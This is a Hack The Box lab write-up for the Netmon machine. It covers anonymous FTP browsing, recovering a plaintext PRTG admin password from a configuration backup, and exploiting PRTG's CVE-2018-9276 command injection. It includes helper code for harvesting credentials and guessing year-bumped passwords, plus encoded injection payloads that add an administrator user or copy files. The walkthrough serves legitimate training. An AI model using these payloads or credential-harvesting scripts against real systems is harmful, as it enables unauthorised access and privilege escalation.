Hack The Box – Netmon Write-up By Nikhil Sahoo

Introduction

Back again with a new blog post. Today we will go through the walkthrough of the Hack The Box machine Netmon, which retired very recently. It was a fairly easy Windows box: getting the user flag was trivial and the root flag wasn't that difficult either. So let's begin.

 

Recon

We'll start our recon with an nmap scan of the box.

 

As we can see from the results, port 21 (FTP) is open and the server allows anonymous login.

So let's connect to the FTP server (when prompted, log in with the username anonymous and any password) by typing in the command:

ftp 10.10.10.152

After logging in, we can browse through the directories and sub-directories. The anonymous FTP root is the C: drive of the box, so eventually we come across the user flag inside “/Users/Public/“ (that is, C:\Users\Public\).

 

We can download the user flag to our machine by typing in:

get user.txt

 

Thus we got our user flag. Now let’s hunt for root flag.

We know from our scan results that port 80 is also open, so let's open it in the browser.

 

On opening it we find the login portal of PRTG Network Monitor, a network monitoring product from Paessler AG.

Now we need to log in somehow, so let's explore the machine further via FTP. Back in the FTP session we find a directory named “ProgramData”; move into it.

 

On changing the directory we will find a sub directory named “Paessler”, so again move into this directory.

 

Now we will find a sub-directory named “PRTG Network Monitor“. Note that the name contains spaces, so wrap it in double quotes when you cd into it with the ftp client.

 

Inside it we find a file named “PRTG Configuration.old.bak” (again, quote the name because of the space); download this file to your machine.

 

Open the file locally and search it for the string “prtgadmin”. It is an XML backup of the PRTG configuration, and next to the login we find the password in clear text: username “prtgadmin” and password “PrTg@dmin2018“.

 

Now let's try these credentials in the login portal, but unfortunately they don't work. The file is an old backup, so the password has most likely been rotated since it was written. Keeping the same pattern and bumping the year to “PrTg@dmin2019″ gets us in.
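The two steps above (pull the credential out of the backup, then try the same password with the year advanced) are worth scripting. The following Python is an added example, not code from the write-up; the XML snippet in it is constructed to imitate only the shape of the relevant fragment of a PRTG configuration backup (a login element beside a password element whose value follows an empty flags marker) and is not the real “PRTG Configuration.old.bak”. The function names are mine.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample that imitates the shape of the relevant fragment of a
# PRTG configuration backup. The real "PRTG Configuration.old.bak" is much
# larger and is not reproduced here. The second user shows what an entry
# without a readable value looks like.
SAMPLE_BACKUP = """<?xml version="1.0" encoding="UTF-8"?>
<data>
  <userdata>
    <user id="100">
      <login>prtgadmin</login>
      <dbpassword>
        <flags><encrypted/></flags>
        PrTg@dmin2018
      </dbpassword>
      <name>PRTG System Administrator</name>
    </user>
    <user id="101">
      <login>readonly</login>
      <dbpassword>
        <flags><encrypted/></flags>
      </dbpassword>
    </user>
  </userdata>
</data>
"""

LOGIN_TAGS = ("login", "username", "user")


def extract_credentials(xml_text):
    """Return (login, password) pairs for every element whose tag mentions
    'pass' and that still carries a readable value. Entries whose value is
    empty (only the <flags/> marker survived) are skipped."""
    root = ET.fromstring(xml_text)
    found = []
    for parent in root.iter():
        # The login is looked up among the siblings of the password element.
        login = None
        for child in parent:
            if child.tag.lower() in LOGIN_TAGS and child.text and child.text.strip():
                login = child.text.strip()
                break
        for child in parent:
            if "pass" not in child.tag.lower():
                continue
            # itertext() also collects the text that follows a child element
            # (the tail of <flags/>), which is where the value sits here.
            value = "".join(child.itertext()).strip()
            if value:
                found.append((login, value))
    return found


def year_variants(password, years_ahead=2):
    """Passwords recovered from an old backup are often rotated by bumping
    the year. Return the password with its first 4-digit year advanced by
    1..years_ahead; an empty list if it contains no year."""
    m = re.search(r"(?:19|20)\d{2}", password)
    if not m:
        return []
    year = int(m.group(0))
    return [
        password[: m.start()] + str(year + i) + password[m.end():]
        for i in range(1, years_ahead + 1)
    ]


if __name__ == "__main__":
    for login, pw in extract_credentials(SAMPLE_BACKUP):
        print(f"{login}: {pw}  try next: {', '.join(year_variants(pw))}")
```

Run against the real backup, the same two functions give you the recovered password and the short list of year-bumped candidates to try at the portal before reaching for a wordlist.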

Googling further, we find a script that exploits an authenticated remote command execution vulnerability in PRTG (CVE-2018-9276, affecting versions before 18.2.39). PRTG lets an administrator create a notification that runs a demo PowerShell script with a user-supplied parameter; the parameter is passed to the script unsanitised, so a “;” ends the intended file-path argument and whatever follows is executed with the privileges of the PRTG server service. The script uses this to add a user named “pentest” with the password “P3nT3st!” to the local Administrators group.

You can find the script here

So we will be using this script, but one small change is needed before running it.

First we need to find the command responsible for creating the new user, so search the code for the following string:

%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+user+pentest+P3nT3st!+%2Fadd%22 which decodes to “C:\Users\Public\tester.txt;net user pentest P3nT3st! /add”.

Secondly, search for the command that adds the created user pentest to the Administrators group:

%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+localgroup+administrators+%2Fadd+pentest%22 which decodes to “C:\Users\Public\tester.txt;net localgroup administrators /add pentest”.

 

The point here is that we don't need to create a new user at all; we just need the root flag, which lives at C:\Users\Administrator\root.txt (the same location on every HTB Windows box). So replace both the net user and the net localgroup commands with the following: “copy C:\Users\Administrator\root.txt C:\Users\Public\nikhil.txt”. This copies the root flag into the Public directory, which we can already read over anonymous FTP. The “C:\Users\Public\tester.txt;” prefix must stay, since that is the argument the demo script expects and the “;” is what turns the rest of the field into a command.

Here is the final parameter:

“C:\Users\Public\tester.txt;copy C:\Users\Administrator\root.txt C:\Users\Public\nikhil.txt” which URL-encodes to %22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bcopy%20C%3A%5CUsers%5CAdministrator%5Croot.txt%20C%3A%5CUsers%5CPublic%5Cnikhil.txt%22 (the original script writes spaces as “+”; %20 and “+” both decode to a space, so either form works).

 

We just need to replace the two commands we located earlier in the script with this encoded string.

We also need a valid session, because the vulnerability is only reachable as an authenticated user. In the browser, press F12 for the developer tools, select the Network tab, pick any request to the portal and copy the cookies from its Cookies tab. (The full syntax for running the script is in the GitHub README as well.)
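Before editing the script it is worth checking that the three encoded strings above really decode to the commands we think they do, and that our replacement is encoded the same way. The following Python is an added example, not code from the write-up or from the exploit script. The “<outfile>;<command>” shape and the three encoded payloads are taken from the text above; the constant names and helper functions are mine.

```python
from urllib.parse import quote_plus, unquote_plus

# Taken from the payloads quoted in the write-up: the notification parameter
# is "<path>;<command>", where <path> is the argument the demo script expects
# and everything after ';' is executed.
DEMO_OUTFILE = r"C:\Users\Public\tester.txt"

# The two encoded parameters as they appear in the original script, and the
# replacement the write-up builds (spaces written as %20 instead of '+').
ORIGINAL_ADD_USER = (
    "%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+user+pentest+P3nT3st!+%2Fadd%22"
)
ORIGINAL_ADD_GROUP = (
    "%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bnet+localgroup+administrators+%2Fadd+pentest%22"
)
REPLACEMENT_COPY = (
    "%22C%3A%5CUsers%5CPublic%5Ctester.txt%3Bcopy%20C%3A%5CUsers%5CAdministrator"
    "%5Croot.txt%20C%3A%5CUsers%5CPublic%5Cnikhil.txt%22"
)


def build_parameter(command):
    """Wrap a Windows command in the injected notification parameter."""
    return f'"{DEMO_OUTFILE};{command}"'


def encode_parameter(parameter):
    """Form-encode the parameter the way it is embedded in the script's
    request: spaces become '+', and safe="" so that '/' (as in '/add')
    becomes %2F like the original payloads."""
    return quote_plus(parameter, safe="")


def decode_parameter(encoded):
    """Inverse of the above; '+' and '%20' both decode to a space."""
    return unquote_plus(encoded)


def same_command(encoded_a, encoded_b):
    """Compare two payloads by their decoded form, so that '+' vs '%20' or
    which characters were percent-encoded ('!' vs '%21') do not matter."""
    return decode_parameter(encoded_a) == decode_parameter(encoded_b)


if __name__ == "__main__":
    for label, enc in (
        ("add user", ORIGINAL_ADD_USER),
        ("add to group", ORIGINAL_ADD_GROUP),
        ("copy flag", REPLACEMENT_COPY),
    ):
        print(f"{label:13}: {decode_parameter(enc)}")
    mine = encode_parameter(
        build_parameter(r"copy C:\Users\Administrator\root.txt C:\Users\Public\nikhil.txt")
    )
    print("re-encoded   :", mine)
    print("equivalent   :", same_command(mine, REPLACEMENT_COPY))
```

If you swap the copy command for something else later, run it through encode_parameter rather than hand-encoding it: a single missed %5C or %3B silently turns the payload into a harmless file path.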

 

Here is the final command to execute; we just need to replace the cookies with our own. OCTOPUS1813713946 is the PRTG session cookie, which is the one the script actually needs; _ga and _gid are Google Analytics cookies and are harmless to include:

./prtg-exploit.sh -u http://10.10.10.152 -c “_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX”

 

If everything went right, we can check by going back to the box via FTP. Inside C:\Users\Public\ we should now find a text file named nikhil.txt; download it and view it locally.

 

Thus we got our root flag and the challenge was successfully completed.

So that's all for now. See you next time. Goodbye!

You can have a look at my previous article on Hack The Box, the Curling write-up. Here is the link to the article

Loved what you read?

If so, then kindly comment, follow and share our website for much more interesting stuff.

For any queries you can send a Hi to my Linkedin Handle: Here

